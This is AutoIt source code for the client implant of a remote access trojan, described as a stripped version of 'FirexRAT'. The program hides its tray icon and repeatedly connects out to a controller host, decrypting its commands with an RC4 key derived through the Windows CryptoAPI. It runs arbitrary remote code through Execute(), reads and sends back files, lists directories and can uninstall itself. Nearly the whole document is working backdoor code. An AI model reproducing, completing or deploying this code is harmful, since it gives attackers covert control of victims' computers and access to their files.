;#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=v.0.5.0[fix.1].exe
#AutoIt3Wrapper_UseUpx=N
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
; #HEAD# ========================================================================================================================
; Title .........: server_v.0.5.0
; Version .......: fix.1
; Language ......: English
; Description ...: Based on stripped version of FirexRAT Project
; Author(s) .....: Firex
; ===============================================================================================================================
;
; _rAut_PackageRecv()		| Receive, decrypt and put package in buffer
; _rAut_PackageProcess()	| Put resultant package in buffer
; _rAut_PackageSend()		| Crypt and send package from buffer
;
; Challenges list:
;	.. < Type: *Challenge
;	1: Execute
;	2: Call
;	3: GetFile
;	4: Report
;	5: Unins
;
;	.. < Type: Default
;	10: Execute_v2
;	11: GetUserInfo
;	12: DirList
;	13: FileList
;
;	.. < Type: Default
;	20: GetChallenge
;	21: GetChallengeSize
;	22: CloseChallenge
;
;	.. < Type: Custom
;	100: Custom ( Real = Custom-100 )
;
; Flags list:
;	.. < Type: Internal
;	0: Default
;	-100: !Next
;	-101: !Success
;	-102: !NoResponse
;
; VarType list:
;	.. < Type: *AutoIt
;	10: Array ( 1D / 2D )
;	11: Int32
;	12: Int64
;	13: Binary
;	14: Bool
;	15: Ptr
;	16: Double
;	17: String
;	18: Keyword ( only - Default )
;	100: !Next request
;
; Errors list:
;	.. < Type: *Internal error
;	220: Unknown challenge
;	221: No active challenge
;	222: !Next for unknown challenge
;	223: Another challenge active
;	224: Bad !Next part index
;
;	.. <Type: @Error
;	X: Defined by @Error flag
; ===========================================================
#Region RemoteAut.Init
TCPStartup()
OnAutoItExitRegister( "_QUIT" )

HotKeySet( '{F6}', '__DEBUGEXIT' )
Func __DEBUGEXIT()
	MsgBox( 64, '', 'Exit...' )
	_QUIT()
EndFunc
; << Your includes here...


; ---
;	# Library of AutoIt types
Global Const $__AUTTYPE[10][2] = [ [9], [10, "Array"], [11, "Int32"], [12, "Int64"], _
	[13, "Binary"], [14, "Bool"], [15, "Ptr"], [16, "Double"], [17, "String"], [18, "Keyword"] ]

Global Const $tagRAUT = "DWORD rAut; UINT uId; INT iFlag; INT Error; INT Extended;", $tagRAUTSZ = 0x14

Global Const $__SVR[] = [ '0.5.0', 'DebugGroup', @IPAddress1, '1818', 'testEncKey', 16, 2, 65536 ]
	; Ver, Group, ClientIP, ClientPort, EncryptKey, Timeout, ReconnectDelay, MaxPackageSz
; *
Global $_rAut_SvrIp, _
	$_rAut_iPing, _
	$_rAut_hSocket, _
	$_rAut_aCrypt, _
	$_rAut_hEncKey, _
	$_rAut_tBuffer, _
	$_rAut_tRaut, _
	$_rAut_tDataBuffer, _
	$_rAut_aChallengeBuffer = -1

$_rAut_tBuffer = DllStructCreate( "BYTE Buffer[" & $__SVR[7] + $tagRAUTSZ & "]; UINT Size; UINT BufSize; PTR Pointer" )
	$_rAut_tBuffer.BufSize = DllStructGetSize( $_rAut_tBuffer ) - 0x0C ;Without Size/BufSize/Ptr
	$_rAut_tBuffer.Pointer = DllStructGetPtr( $_rAut_tBuffer )

$_rAut_tRaut = DllStructCreate( $tagRAUT, $_rAut_tBuffer.Pointer )
$_rAut_tDataBuffer = DllStructCreate( "BYTE Buffer[" & $__SVR[7] & "]", $_rAut_tBuffer.Pointer + $tagRAUTSZ )

If _rAut_CryptStartup() Then
	$_rAut_hEncKey = _rAut_CryptDeriveKey( $__SVR[4] )

	If $_rAut_hEncKey Then _
		_MAIN()
EndIf
#EndRegion RemoteAut.Init


#Region RemoteAut.Main
Func _MAIN()
	Local $fRet
	; ---
	Do ;The basic entrance /Ping control
		$_rAut_SvrIp = TCPNameToIP( $__SVR[2] )

		$_rAut_iPing = Ping( $_rAut_SvrIp )
		While $_rAut_iPing ;.. /Socket control
			$_rAut_hSocket = TCPConnect( $_rAut_SvrIp, $__SVR[3] )
			If @Error Then _
				ExitLoop

			Do ;.. /Package control
				$fRet = _rAut_PackageRecv()
				If Not @Error And $fRet Then
					$fRet = _rAut_PackageProcess()

					If Not @Error And $fRet Then _
						_rAut_PackageSend()
				EndIf
				If @Error Then ; Any error @ bad client
					TCPCloseSocket( $_rAut_hSocket )
					ExitLoop
				EndIf
			Until False
			; ---
			$_rAut_iPing = 0
		WEnd

		Sleep( $__SVR[6] * 1000 )
	Until False
EndFunc
#EndRegion RemoteAut.Main


#Region RemoteAut.Shutdown
_QUIT()
Func _QUIT()
	If $_rAut_hEncKey Then _
		_rAut_CryptDestroyKey( $_rAut_hEncKey )
	If IsArray( $_rAut_aCrypt ) Then _
		_rAut_CryptShutdown()
	If $_rAut_hSocket Then _
		TCPCloseSocket( $_rAut_hSocket )

	OnAutoItExitUnregister( "_QUIT" )
	TCPShutdown()
	; ---
	Exit 0
EndFunc
#EndRegion RemoteAut.Shutdown


#Region RemoteAut.Handlers
Func _rAut_PackageRecv()
	Local $vRecv
	; ---
	$vRecv = TCPRecv( $_rAut_hSocket, $__SVR[7] + $tagRAUTSZ, 1 )
	Switch @Error
		Case 0
			$_rAut_tBuffer.Buffer = $vRecv
			$_rAut_tBuffer.Size = BinaryLen( $vRecv )
			; *
			If _rAut_CryptDecrypt( $_rAut_tBuffer, $_rAut_hEncKey ) Then
				Return 1
			EndIf
		Case -1
			SetError( 0 )
	EndSwitch
	Return 0
EndFunc

Func _rAut_PackageSend()
	If _rAut_CryptEncrypt( $_rAut_tBuffer, $_rAut_hEncKey ) Then _
		TCPSend( $_rAut_hSocket, BinaryMid( $_rAut_tBuffer.Buffer, 1, $_rAut_tBuffer.Size ) )

	Return SetError( @Error, 0, @Error <> 0 )
EndFunc

Func _rAut_PackageProcess()
	Local $vPackBody, $fInstant, $vAutData = 0, $iTErr = 0
	; ---
	$vPackBody = BinaryToString( BinaryMid( $_rAut_tDataBuffer.Buffer, 1, $_rAut_tBuffer.Size - $tagRAUTSZ ) )
	; *
	If $_rAut_tRaut.iFlag <> -100 Then ;!Next
		Do
			Switch $_rAut_tRaut.uId
				Case 1 ;Execute
					$vAutData = $vPackBody
				Case 2 ;Call
					$vAutData = 'Call("' & $vPackBody & '")'
				Case 3 ;GetFile
					$vAutData = 'FileRead("' & $vPackBody & '")'
				Case 4 ;CreateReport
					; Nothing
				Case 5 ;Unins000
					_QUIT()
				; ---
				Case Else
					Switch $_rAut_tRaut.uId
						Case 10 ;Execute_v2
							$vAutData = $vPackBody
						Case 11 ;GetUserInfo
							; Nothing
						Case 12 ;DirList
							$vAutData = '__rAut_GetFileList("' & $vPackBody & '", "*", 2 )'
						Case 13 ;FileList
							$vAutData = '__rAut_GetFileList("' & $vPackBody & '", "*", 1 )'

						Case 20 ;GetChallenge
							If $_rAut_aChallengeBuffer <> -1 Then
								$vAutData = '"' & $_rAut_aChallengeBuffer[0] & "|" & UBound($_rAut_aChallengeBuffer)-1 & '"'
							Else
								$iTErr = 221
							EndIf
						Case 21 ;CloseChallenge
							If $_rAut_aChallengeBuffer <> -1 And $vPackBody == $_rAut_aChallengeBuffer[0] Then
								$_rAut_aChallengeBuffer = -1
								$vAutData = True
							Else
								$iTErr = 221
							EndIf

						Case Else
							$iTErr = 220
					EndSwitch
					; -
					$fInstant = True ;InstantResponse
					ExitLoop ;Skip Challenge-Open check's for instant response
			EndSwitch
			If $_rAut_aChallengeBuffer <> -1 Then
				$iTErr = 223
				$vAutData = 0 ;PreventExecuting
				$fInstant = True ;InstantResponse
			EndIf
		Until True
		$vAutData = Execute( $vAutData )
			$_rAut_tRaut.Error = @error
			$_rAut_tRaut.Extended = @extended

		If $_rAut_tRaut.iFlag = -102 Then _
			Return 0
		; ---
		$_rAut_tRaut.iFlag = __rAut_VarType( $vAutData ) ;Like TYPE
		Switch $_rAut_tRaut.iFlag
			Case 13 ;Binary
				;Nothing
			Case 10
				$vAutData = __rAut_ArrayToPack( $vAutData )
				ContinueCase
			Case Else
				$vAutData = StringToBinary( $vAutData )
		EndSwitch

		If Not $fInstant Then
			Local $iDataSize = BinaryLen( $vAutData ), _
				$iUB = Ceiling( $iDataSize / $__SVR[7] )
			; -
			Dim $_rAut_aChallengeBuffer[ $iUB+1 ] = [ $_rAut_tRaut.uId ]
			For $Idx = 1 To $iUB Step 1
				$_rAut_aChallengeBuffer[$Idx] = BinaryMid( $vAutData, (($Idx-1)*$__SVR[7])+1, $__SVR[7] )
			Next
			; -
			$vAutData = $iUB & "|" & $iDataSize
		Else
			$_rAut_tRaut.uId = 100 + $_rAut_tRaut.uId
		EndIf
	Else
		$_rAut_tRaut.Error = 0
		$_rAut_tRaut.Extended = 0
		Select
			Case $_rAut_aChallengeBuffer = -1
				$iTErr = 222
			Case $_rAut_aChallengeBuffer[0] <> $_rAut_tRaut.uId
					$iTErr = 223
			Case Else
				Local $iPart = Int( $vPackBody )
				; *
				If $iPart < 1 Or $iPart >= UBound( $_rAut_aChallengeBuffer ) Then
					$iTErr = 224
				Else
					$vAutData = $_rAut_aChallengeBuffer[$iPart]
				EndIf
		EndSelect
		$_rAut_tRaut.iFlag = 100 ;!Next request
	EndIf
	If $iTErr Then _
		$_rAut_tRaut.Error = $iTErr

	$_rAut_tDataBuffer.Buffer = $vAutData
	$_rAut_tBuffer.Size = BinaryLen( $vAutData ) + $tagRAUTSZ
	Return 1
EndFunc
#EndRegion RemoteAut.Handlers


#Region RemoteAut.Internal
Func __rAut_VarType( ByRef $pVar )
	Local $sType
	; ---
	$sType = VarGetType( $pVar )
	For $Idx = 1 To $__AUTTYPE[0][0] Step 1
		If $sType = $__AUTTYPE[$Idx][1] Then _
			Return $__AUTTYPE[$Idx][0]
	Next
	Return 17
EndFunc

Func __rAut_ArrayToPack( $vArray )
    If Not IsArray($vArray) Then _
		Return $vArray

	Local $iRows, $iCols, $iDim, $Idx, $Jix, $sPack
	; ---
	$iDim = UBound( $vArray, 0 )
	$iRows = UBound( $vArray, 1 )
	$iCols = UBound( $vArray, 2 )
	; *
	$sPack = "Array" & $iRows & "x" & $iCols & "="
	If $iDim > 2 Then
		$sPack = $iDim & "D Arrays not supported!"
		Return $sPack
	EndIf

	For $Idx = 0 To $iRows - 1
		If $iDim = 2 Then
			For $Jix = 0 To $iCols - 1
				$sPack &= __StringToHex( $vArray[$Idx][$Jix] ) & "|"
			Next
		Else
			$sPack &= __StringToHex( $vArray[$Idx] ) & "|"
		EndIf
	Next
	Return StringTrimRight( $sPack, 1 )
EndFunc

Func __rAut_GetFileList( $sPath, $sFilter = '*', $iFlag = 0 )
	Local $hSearch, $sFile, $sList, $vRet = ''
	; ---
	$sPath = StringRegExpReplace($sPath, "[\\/]+\z", "") & "\"
	If Not FileExists($sPath) Then _
		Return SetError(1, 1, "")
	If StringRegExp($sFilter, "[\\/:><\|]|(?s)\A\s*\z") Then _
		Return SetError(2, 2, "")
	If Not ($iFlag = 0 Or $iFlag = 1 Or $iFlag = 2) Then _
		Return SetError(3, 3, "")

	$hSearch = FileFindFirstFile($sPath & $sFilter)
	If @Error Then Return _
		SetError(4, 4, "")

	While 1
		$sFile = FileFindNextFile($hSearch)
		If @Error Then _
			ExitLoop
		If ($iFlag + @Extended = 2) Then _
			ContinueLoop

		$sList &= "|" & $sFile
	WEnd
	FileClose($hSearch)
	If Not $sList Then _
		Return SetError(4, 4, "")

	$vRet = StringSplit( StringTrimLeft( $sList, 1 ), "|" )
	Return $vRet
EndFunc   ;Like UDF function

Func __StringToHex( $sStr )
	Return StringTrimLeft( StringToBinary( $sStr ), 2 )
EndFunc
#EndRegion RemoteAut.Internal


#Region RemoteAut.Crypt
Func _rAut_CryptStartup()
	Local $aRet
	Dim $_rAut_aCrypt[2]
	; ---
	$_rAut_aCrypt[0] = DllOpen( "AdvAPI32.dll" )
	$aRet = DllCall( $_rAut_aCrypt[0], "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", 24, "dword", 0xF0000000 )
	If @Error Or Not $_rAut_aCrypt[0] Then _
		Return 0

	$_rAut_aCrypt[1] = $aRet[1]
	Return 1
EndFunc

Func _rAut_CryptShutdown()
	If $_rAut_aCrypt[1] Then _
		DllCall( $_rAut_aCrypt[0], "bool", "CryptReleaseContext", "handle", $_rAut_aCrypt[1], "dword", 0 )

	DllClose( $_rAut_aCrypt[0] )
EndFunc

Func _rAut_CryptDeriveKey($vKey)
	Local $aRet, $tBuff, $hCryptHash, $vRet
	; ---
	$tBuff = DllStructCreate("byte Key[" & BinaryLen($vKey) & "]")
		$tBuff.Key = $vKey

	$aRet = DllCall( $_rAut_aCrypt[0], "bool", "CryptCreateHash", "handle", $_rAut_aCrypt[1], "uint", 0x00008003, "ptr", 0, "dword", 0, "handle*", 0 )
	If Not @Error And $aRet[0] Then
		$hCryptHash = $aRet[5]
		; *
		$aRet = DllCall( $_rAut_aCrypt[0], "bool", "CryptHashData", "handle", $hCryptHash, "struct*", $tBuff, "dword", DllStructGetSize($tBuff), "dword", 1 )
		If Not @Error And $aRet[0] Then
			$aRet = DllCall( $_rAut_aCrypt[0], "bool", "CryptDeriveKey", "handle", $_rAut_aCrypt[1], "uint", 0x6601, "handle", $hCryptHash, "dword", 1, "handle*", 0 )
			If Not @Error And $aRet[0] Then _
				$vRet = $aRet[5]
		EndIf
		DllCall( $_rAut_aCrypt[0], "bool", "CryptDestroyHash", "handle", $hCryptHash)
	EndIf
	Return $vRet
EndFunc

Func _rAut_CryptDestroyKey($hCryptKey)
	Local $aRet
	; ---
	$aRet = DllCall( $_rAut_aCrypt[0], "bool", "CryptDestroyKey", "handle", $hCryptKey )
	If @Error Or Not $aRet[0] Then _
		Return 0

	Return 1
EndFunc

Func _rAut_CryptEncrypt($tBuff, $hCryptKey)
	Local $aRet
	; ---
	$aRet = DllCall( $_rAut_aCrypt[0], "bool", "CryptEncrypt", "handle", $hCryptKey, "handle", 0, "bool", 1, "dword", 0, "struct*", $tBuff, "dword*", $tBuff.Size, "dword", $tBuff.BufSize )
	If @Error Or Not $aRet[0] Then _
		Return 0

	$tBuff.Size = ( Floor( $tBuff.Size / 8 ) + 1 ) * 8
	Return 1
EndFunc

Func _rAut_CryptDecrypt($tBuff, $hCryptKey)
	Local $aRet
	; ---
	$aRet = DllCall( $_rAut_aCrypt[0], "bool", "CryptDecrypt", "handle", $hCryptKey, "handle", 0, "bool", 1, "dword", 0, "struct*", $tBuff, "dword*", $tBuff.Size )
	If @Error Or Not $aRet[0] Then _
		Return 0

	$tBuff.Size = $aRet[6]
	Return 1
EndFunc
#EndRegion RemoteAut.Crypt